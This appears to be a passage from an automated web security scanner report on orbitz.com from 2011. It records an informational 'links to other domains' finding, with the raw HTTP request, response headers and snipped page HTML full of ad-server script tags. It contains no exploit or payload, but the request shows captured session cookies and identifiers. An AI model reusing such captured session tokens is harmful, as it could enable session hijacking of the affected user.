<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.362. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/ViewRoundTripSearch?retrieveParams=true&z=2ec8&r=r

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/ViewRoundTripSearch?retrieveParams=true&z=2ec8&r=r HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=075CD6546FB8B88AE93BFB6371A92EEC; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:45 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:44 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 156685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
